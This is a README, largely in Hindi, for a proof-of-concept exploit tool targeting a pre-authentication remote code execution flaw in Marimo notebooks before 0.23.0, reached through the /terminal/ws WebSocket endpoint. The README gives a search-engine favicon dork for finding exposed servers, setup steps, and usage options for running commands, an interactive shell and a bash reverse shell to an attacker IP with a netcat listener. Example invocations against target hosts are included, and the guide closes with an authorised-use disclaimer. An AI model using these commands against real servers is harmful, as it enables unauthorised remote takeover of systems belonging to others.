
CVE-2026-39987 शोषण उपकरण - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)
Marimo के 0.23.0 से पहले के संस्करणों में एक गंभीर प्री-प्रमाणीकरण रिमोट कोड निष्पादन (RCE) कमजोरी के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट।
यह कमजोरी एक अप्रमाणित हमलावर को वेबसॉकेट एंडपॉइंट (/terminal/ws) से जुड़ने और लक्ष्य सर्वर पर मनमानी सिस्टम कमांड निष्पादित करने की अनुमति देती है।
/api/version एंडपॉइंट के माध्यम से) सत्यापित करता है।--no-check फ्लैग के साथ संस्करण और उपस्थिति जाँच को बायपास करने की क्षमता जहाँ एंडपॉइंट छिपे हो सकते हैं।संभावित रूप से कमजोर उदाहरणों की पहचान करने के लिए आप निम्न डॉर्क का उपयोग कर सकते हैं:
http.favicon.hash:-1864630356
निर्भरताएँ स्थापित करने के लिए Python आभासी वातावरण का उपयोग करने की अनुशंसा की जाती है।
# 1. Clone the repository
git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git
cd CVE-2026-39987-POC
# 2. Create and activate a virtual environment
python -m venv .CVE-2026-39987
# Windows
.CVE-2026-39987\Scripts\activate
# Linux/macOS
source .CVE-2026-39987/bin/activate
# 3. Upgrade pip and Install required dependencies
# Windows
py pip install --upgrade pip ; pip install -r requirements.txt
# Linux/MacOS
python3 pip install --upgrade pip && pip install -r requirements.txt
usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--ping-interval SEC] [--ping-timeout SEC] [--no-ping] [--max-retries N] [--no-reconnect] [--no-check] target [command]
positional arguments:
target Target URL (e.g. http://localhost:8080)
command Command to execute (omit when using -i)
options:
-h, --help show this help message and exit
--no-check Skip vulnerability version check
Execution modes:
-i, --interactive Interactive shell mode
--revshell IP PORT Generate & send a bash reverse shell payload
WebSocket tuning:
--ping-interval SEC WebSocket ping interval in seconds (default: 30, more frequent for stability)
--ping-timeout SEC WebSocket ping timeout in seconds (default: 300, increased from 120 for slow servers)
--no-ping Disable WebSocket ping/pong entirely (recommended if still disconnect)
Reconnect options:
--max-retries N Max auto-reconnect attempts (default: 5)
--no-reconnect Disable auto-reconnect on unexpected disconnect
1. एकल कमांड चलाएँ:
python CVE-2026-39987.py http://target.com:8080 "id"
2. इंटरैक्टिव शेल शुरू करें:
python CVE-2026-39987.py http://target.com:8080 -i
3. रिवर्स शेल निष्पादित करें:
सुनिश्चित करें कि आपकी मशीन पर netcat लिसनर चल रहा है (जैसे, nc -lvnp 4444)।
python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444
4. सत्यापन जाँच छोड़ें और बलपूर्वक निष्पादन करें:
python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check
योगदान का स्वागत है! कृपया बेझिझक एक पुल रिक्वेस्ट जमा करें।
git checkout -b feature/update-feature)git commit -m 'Add update feature')git push origin feature/update-feature)यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत नैतिक हैकिंग के लिए है। लेखक इस स्क्रिप्ट के कारण होने वाले किसी भी दुरुपयोग, क्षति या अवैध गतिविधियों के लिए जिम्मेदार नहीं है। कोई भी सुरक्षा परीक्षण करने से पहले हमेशा सुनिश्चित करें कि आपके पास सिस्टम स्वामी से स्पष्ट अनुमति है। इस स्क्रिप्ट का अनधिकृत उपयोग अवैध है और कानून द्वारा दंडनीय है।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।